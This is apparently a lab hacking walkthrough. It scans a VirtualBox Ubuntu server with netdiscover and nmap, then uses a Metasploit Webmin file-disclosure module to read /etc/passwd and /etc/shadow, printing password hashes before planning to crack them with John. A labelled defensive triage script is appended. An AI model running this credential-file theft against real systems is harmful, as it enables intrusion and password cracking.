Hacking on the weekend: how do we get into the system? To get in, we have to follow the rules of hacking.
What should the first step be? Yeah, information gathering is the first step.
root@cupenk:~# netdiscover
Currently scanning: 192.168.48.0/16 | Screen View: Unique Hosts
91 Captured ARP Req/Rep packets, from 10 hosts. Total size: 5460
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.0.40 10:78:d2:36:65:a4 10 600 Unknown vendor
192.168.0.99 60:eb:69:06:22:ec 17 1020 Unknown vendor
192.168.0.137 00:23:8b:f6:c6:b7 11 660 Unknown vendor
192.168.0.21 08:00:27:f9:c1:bb 19 1140 CADMUS COMPUTER SYSTEMS
192.168.0.89 00:1d:72:1a:56:9c 10 600 Wistron Corporation
192.168.0.104 f4:6d:04:81:f9:39 10 600 Unknown vendor
192.168.0.105 00:1d:72:0d:bb:13 11 660 Wistron Corporation
192.168.0.90 70:5a:b6:17:33:40 01 060 Unknown vendor
192.168.0.98 00:26:22:9b:ac:54 01 060 Unknown vendor
192.168.0.138 00:23:5a:ef:0d:a2 01 060 Unknown vendor
A VirtualBox system has shown up on my network (the Cadmus Computer Systems MAC vendor, at 192.168.0.21); a server is installed on this VirtualBox guest.
Next I scan it: are any services running there?
root@cupenk:~# nmap -Pn -v -A -sS 192.168.0.21
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 17:13 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 17:13
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 17:13, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:13
Completed Parallel DNS resolution of 1 host. at 17:13, 13.00s elapsed
Initiating SYN Stealth Scan at 17:13
Scanning 192.168.0.21 [1000 ports]
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 17:13, 0.13s elapsed (1000 total ports)
Initiating Service scan at 17:13
Scanning 5 services on 192.168.0.21
Completed Service scan at 17:13, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 17:13
Completed NSE at 17:13, 1.02s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.001 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-02-05 00:13:51 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.0.21
NSE: Script Post-scanning.
Initiating NSE at 17:13
Completed NSE at 17:13, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
Yeah, some ports are open on the system. Any vulns there? I have to run Nessus to scan for vulnerabilities.
[Nessus scan result (image): 44 vulns, 1 high, 4 medium, 29 low]
The high vuln is on port 22. I tried attacking that port (OpenSSH) and failed, so I tried again against another port:
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
Exploiting port 10000 with Metasploit:
msf > nmap -T4 -Pn -v -A 192.168.0.21
[*] exec: nmap -T4 -Pn -v -A 192.168.0.21
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-02-04 18:08 WIT
NSE: Loaded 61 scripts for scanning.
Initiating ARP Ping Scan at 18:08
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 18:08, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:09, 13.00s elapsed
Initiating SYN Stealth Scan at 18:09
Scanning 192.168.0.21 [1000 ports]
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 18:09, 0.09s elapsed (1000 total ports)
Initiating Service scan at 18:09
Scanning 5 services on 192.168.0.21
Completed Service scan at 18:09, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
Retrying OS detection (try #2) against 192.168.0.21
Retrying OS detection (try #3) against 192.168.0.21
Retrying OS detection (try #4) against 192.168.0.21
Retrying OS detection (try #5) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.45s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.51SVN%D=2/4%OT=22%CT=1%CU=36721%PV=Y%DS=1%DC=D%G=Y%M=080027%TM=
OS:4F2D11EF%P=i686-pc-linux-gnu)SEQ(SP=D4%GCD=1%ISR=EF%TI=Z%CI=Z%II=I%TS=7)
OS:OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4
OS:ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
OS:ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%
OS:RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.040 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=212 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Name: MSHOME\Unknown
|_ System time: 2012-02-05 01:09:34 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.0.21
NSE: Script Post-scanning.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.00s elapsed
Read data files from: /opt/framework/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.82 seconds
Raw packets sent: 1096 (52.018KB) | Rcvd: 1076 (46.598KB)
msf > search webmin
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options
Module options (auxiliary/admin/webmin/file_disclosure):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host
msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(file_disclosure) > show options
Module options (auxiliary/admin/webmin/file_disclosure):
Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST 192.168.0.21 yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host
msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
Next I crack the passwords with John the Ripper.
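As an added example (not from the original post), here is a small Python triage of the two files the Webmin module returned, showing what a defender faces after such a disclosure: which accounts carry a real hash behind a shell that accepts logins, and which crypt(3) scheme protects each hash (every real hash above is MD5-crypt, $1$), so those are the passwords to rotate. The sample lines are copied from the output above; the scheme table and no-login shell list are my own assumptions.

```python
# Added example, not from the original post: triage the /etc/passwd and /etc/shadow
# lines the Webmin file-disclosure module returned. An account is "exposed" when it
# has a real hash and a shell a password can log in with. Sample lines copied from
# the post's output (root, daemon, dhcp, vmware).
# crypt(3) modular prefixes (assumed table); $1$ is MD5-crypt, the weakest of these.
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt", "$y$": "yescrypt"}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
"""

def hash_scheme(field: str) -> str:
    """Classify one shadow password field: 'locked', a known scheme, or 'unknown'."""
    if field in ("", "*") or field.startswith("!"):
        return "locked"  # no password or locked account: nothing to crack
    for prefix, scheme in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return scheme
    return "unknown"  # e.g. legacy 13-char DES-crypt: still a real hash

def triage(passwd_text: str, shadow_text: str) -> dict:
    """Join passwd and shadow on the user name; return per-account findings."""
    passwd = {}
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7:
            passwd[f[0]] = {"uid": int(f[2]), "shell": f[6]}
    findings = {}
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) < 2 or f[0] not in passwd:
            continue  # malformed line, or shadow entry with no passwd entry
        acct = dict(passwd[f[0]], scheme=hash_scheme(f[1]))
        acct["exposed"] = acct["scheme"] != "locked" and acct["shell"] not in NOLOGIN_SHELLS
        findings[f[0]] = acct
    return findings

if __name__ == "__main__":
    for name, a in triage(PASSWD_SAMPLE, SHADOW_SAMPLE).items():
        print(name, "EXPOSED" if a["exposed"] else "ok", a["scheme"], a["shell"])
```

Run against the full /etc/passwd and /etc/shadow output above, it lists root, vmware, obama, osama and yomama as the accounts to rotate, all on MD5-crypt.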